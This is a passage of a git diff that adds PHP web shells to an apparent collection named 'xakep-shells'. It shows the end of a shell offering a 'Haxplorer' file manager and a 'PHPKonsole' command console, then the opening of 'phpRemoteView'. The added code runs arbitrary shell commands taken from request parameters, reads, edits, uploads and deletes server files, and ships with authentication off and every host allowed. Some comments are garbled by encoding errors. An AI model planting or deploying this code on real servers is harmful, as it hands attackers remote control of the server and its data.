+ 				echo "<Strong>X<strong>";
+   			if (function_exists('is_uploaded_file')){
+ 				if ( @is_uploaded_file("$dir/$file") )
+ 					echo "<Strong>U<strong>";
+ 			}
+ 			else {
+				echo "<Strong>(U)<strong>";
+			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+			 	/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+ 			echo "</tr>\n";
+ 		}
+  	}
+
+    	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+  	echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
+  	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+  	echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+	
+	function printpagelink($a, $b, $link = ""){
+		if ($link != "") 
+			echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+		else
+			echo "<b>| $a - $b |</b>";
+	}
+        
+	if ( count($filelist)-1 > $Pmax ) {
+		echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+		$Fi = 0;
+		while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+			$from = $Fi*$Pmax;
+			while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+			$to = ($Fi + 1) * $Pmax - 1;
+			if ($Fi == $Pidx)
+				$link="";
+			else 
+				$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+			printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+			echo "&nbsp;&nbsp;&nbsp;";
+			$Fi++;
+		}
+		$from = $Fi*$Pmax;
+		while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+		$to = count($filelist)-1;
+		if ($Fi == $Pidx)
+			$link="";
+		else 
+			$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+		printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);		
+		
+	
+		echo "</center></td></tr></table></td></tr>";
+	}
+
+
+    	echo "</table>\n<br><table NOWRAP>";
+
+  	if ($isGoodver) {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+	}
+ 	else {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+	}
+      		/* <!-- Other Actions --> */
+   	echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+  	echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+	                     buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+			     buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+    	echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+  	echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+  	echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
+   	echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
+  	echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
+  	echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
+  	echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+  	echo "</table></td>";
+ 	echo "</table>";
+ 	echo "<br>";
+     	@closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+ 	echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (Mydeldir($file)==false) {
+ 			echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+	}
+ 	else {
+		echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+     	<input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (@unlink($file)==false) {
+ 			echo "Could not remove \"$file\"<br>";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+        }
+ 	else {
+       	echo "Are you sure you want to delete \"$file\" ?
+      	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+       	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+	echo "<center><table><tr><td NOWRAP>";
+ 	$i = 1;
+ 	while (file_exists("$lastdir/newfile$i.txt"))
+ 		$i++;
+ 	$file = fopen("$lastdir/newfile$i.txt", "w+");
+ 	if ($file == false)
+ 		echo "Could not create the new file...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+ 		echo "
+   			<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+			<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+			<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+			<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+			</form></center>
+ 			</td></tr></table></center>   		";
+	}
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	$i = 1;
+ 	while (is_dir("$lastdir/newdir$i"))
+  		$i++;
+ 	$file = mkdir("$lastdir/newdir$i", 0777);
+ 	if ($file == false)
+ 		echo "Could not create the new directory...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+ 	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+		<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+		<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+		<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+		</form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+	$contents = "";
+	$fc = @file( $file );
+  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		$contents .= htmlentities( $line ) ;
+ 	}
+ 	echo "<br><center><table><tr><td NOWRAP>";
+	echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+	echo "<strong>EDIT FILE: </strong>$file<br>\n";
+	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+	echo "<input type=\"submit\" value=\"Save\">";
+	echo "</form>";
+	echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+	$fo = fopen($file, "w");
+	$wrret = fwrite($fo, stripslashes($contents));
+	$clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+	$downloadfile = urldecode($file);
+	if (function_exists("basename"))
+    		$downloadto = basename ($downloadfile);
+	else
+		$downloadto = "download.ext";
+	if (!file_exists("$downloadfile"))
+		echo "The file does not exist";
+	else {
+		$size = @filesize("$downloadfile");
+		if ($size != false) {
+			$add="; size=$size";
+		}			
+		else {
+			$add="";
+		}
+ 		header("Content-Type: application/download");
+		header("Content-Disposition: attachment; filename=$downloadto$add");
+		$fp=fopen("$downloadfile" ,"rb");
+		fpassthru($fp);
+		flush();
+	}
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+   	?>
+	<center>
+	 <table>
+	  <tr>
+	   <td NOWRAP>
+    		Welcome to the upload section...
+ 		Please note that the destination file will be
+		<br> overwritten if it already exists!!!<br><br>
+ 		<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+ 			<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+ 			<input type="hidden" name="cmd" value="uploadproc">
+ 			<input type="hidden" name="dir" value="<?php echo $dir ?>">
+ 			<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+ 			<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+ 			Select local file:<br>
+ 			<input size="75" name="userfile" type="file"><br>
+ 			<input type="submit" value="Send File">
+ 		</form>
+		<br>
+ 		<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+			<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+			<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+			<input tabindex="0" type="submit" value="Cancel">
+		</form>
+	   </td>
+	  </tr>
+	 </table>
+	</center>
+
+ 	<?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+	echo "<center><table><tr><td NOWRAP>";
+	if (file_exists($userfile))
+		$res = copy($userfile, "$dir/$userfile_name");
+	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+     	if ($res) {
+		echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+		echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
+		echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+	}
+	else {
+		echo "Could not move uploaded file; Action aborted...";
+	}
+	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+	echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+	$fc = @file( $file );  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		echo spacetonbsp(@htmlentities($line))."<br>\n";
+  	}
+	echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+     	if (function_exists('is_dir')) {
+ 		if (is_dir("$oldfile")) {
+ 			$objname = "Directory";
+ 			$objident = "Directory";
+  		}
+ 		else {
+ 			$objname = "Filename";
+ 			$objident = "file";
+ 		}
+ 	}
+   	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+	If (empty($newfile) != true) {
+ 		echo "<center>";
+	 	$return = @rename($oldfile, "$olddir$newfile");
+		if ($return) {
+ 			echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+ 		}
+ 		else {
+ 			if ( @file_exists("$olddir$newfile") ) {
+ 				echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+ 			}
+ 			else {
+ 				echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+ 			}
+  		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+ 	}
+ 	else {
+ 		$dpos = strrpos($oldfile, "/");
+ 		if (strval($dpos)!="") {
+ 			$olddir = substr($oldfile, 0, $dpos+1);
+   		}
+ 		else {
+ 			$olddir = "$lastdir/";
+		}
+ 		$fpos = strrpos($oldfile, "/");
+ 		if (strval($fpos)!="") {
+ 			$inputfile = substr($oldfile, $fpos+1);
+   		}
+ 		else {
+	 		$inputfile = "";
+ 		}
+       		echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+ 		echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+ 		echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+ 		echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+ 		echo "Rename \"$oldfile\" to:<br>\n";
+ 		echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+		echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+ 		echo "</td></tr></table></center>";
+ 	}
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>
+<h3>PHPKonsole</h3>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+    if (!empty($HTTP_POST_VARS))
+	extract($HTTP_POST_VARS);
+	  
+    if (!empty($HTTP_GET_VARS))
+	extract($HTTP_GET_VARS);
+	      
+    if (!empty($HTTP_SERVER_VARS))
+	extract($HTTP_SERVER_VARS);
+    }
+		    
+    if (!empty($work_dir)) {
+	if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	        if ($regs[1][0] == '/') {
+	            $new_dir = $regs[1];
+		} else {
+		    $new_dir = $work_dir . '/' . $regs[1];
+		}
+		if (file_exists($new_dir) && is_dir($new_dir)) {
+		    $work_dir = $new_dir;
+		}
+		unset($command);
+	    }
+	}
+    }
+    if (file_exists($work_dir) && is_dir($work_dir)) {
+	chdir($work_dir);
+    }
+    $work_dir = exec('pwd');
+?>
+
+    <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
+	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
+	<input type="hidden" name="cmd" value="con">
+	<?php
+	    $work_dir_splitted = explode('/', substr($work_dir, 1));
+	    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
+	    if (!empty($work_dir_splitted[0])) {
+		$path = '';
+		for ($i = 0; $i < count($work_dir_splitted); $i++) {
+		    $path .= '/' . $work_dir_splitted[$i];
+		    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
+		}
+	    }
+	?></b></td>
+	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
+	
+	<?php
+	$dir_handle = opendir($work_dir);
+	while ($dir = readdir($dir_handle)) {
+	    if (is_dir($dir)) {
+		if ($dir == '.') {
+		    echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+		} elseif ($dir == '..') {
+		    if (strlen($work_dir) == 1) {
+		    }
+		    elseif (strrpos($work_dir, '/') == 0) {
+			echo "<option value=\"/\">Parent Directory</option>\n";
+		    } else {
+			echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+		    }
+		} else {
+		    if ($work_dir == '/') {
+			echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+		    } else {
+			echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+		    }
+		}
+	    }
+	}
+	closedir($dir_handle);
+	?>
+	</select></td></tr></table>
+	<p>Command: <input class="inputtext" type="text" name="command" size="60">
+	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
+	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
+	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
+	    if (!empty($command)) {
+	        echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; 
+		if ($stderr) {
+		    $tmpfile = tempnam('/tmp', 'phpshell');
+		    $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
+		} else if ($command == 'ls') {
+		    $command .= ' -F';
+		}
+		$output = `$command`;
+		echo htmlspecialchars($output);
+	    }
+	?></textarea>
+    </form>
+																													      
+    <script language="JavaScript" type="text/javascript">
+	document.forms[0].command.focus();
+    </script>
+ </td></tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+	$isMainMenu = true;
+     ?>
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="border">
+	   <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+	<br>
+ 	<center>
+	<table border="0" NOWRAP>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   Haxplorer is a server side file browser wich (ab)uses the directory object to list
+ 	   the files and directories stored on a webserver. This handy tools allows you to manage
+ 	   files and directories on a unsecure server with php support.<br><br>This entire script
+ 	   is coded for unsecure servers, if your server is secured the script will hide commands
+ 	   or will even return errors to your browser...<br><br>
+	  </td>
+	 </tr>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+	    When you run commands they will run as the webservers UserID. This should work perfectly
+	    for managing files, like moving, copying etc. If you're using a linux server, system commands
+	    such as ls, mv and cp will be available for you... <br><br>This function will only work if the
+	    server supports php and the execute commands...<br><br>
+	  </td>
+	 </tr>
+        </table>
+	</center>
+	<br>
+     <?php
+}
+
+if ($cmd != "downl") {
+	if ( $isMainMenu != true) {
+ 		?>
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+		 <tr>
+		  <td width="100%" style="class="silver border">
+		   <center><strong>
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con");        ?>&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+ 		   </strong></center>
+		  </td>
+		 </tr>
+		</table>
+		<br>
+		<?php
+}
+	?>
+	<table width=100% border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="silver border">
+	   <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+ 	   </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?>
diff --git a/xakep-shells/PHP/PHPRemoteView.php.txt b/xakep-shells/PHP/PHPRemoteView.php.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/xakep-shells/PHP/PHPRemoteView.php.txt
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ������ ������������� ����������, ����������� � $cs:
+   $cc[0] - �� ����� ������� �����������, � ���� ��� �� �����:
+               n - �� �����
+               e - ����������
+   $cc[1] - ������� (0 - �������. 1 - ���������)
+   $cc[2] - ���������� �� ������
+   $cc[3] - ��� ������ ��� ����� �� ������ �����:
+               0 - �������� � text/plain
+               1 - �������� � html
+               2 - download
+               3 - ��������� ����� (info)
+   $cc[4] - ��������� ������ ������ �� ��/��/��
+   $cc[5] - ����:
+               1 - ����������
+               2 - ������
+
+$cn / $cp[1] - ������ ������� � �� �������, ������� ����������, ������ ����/����:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
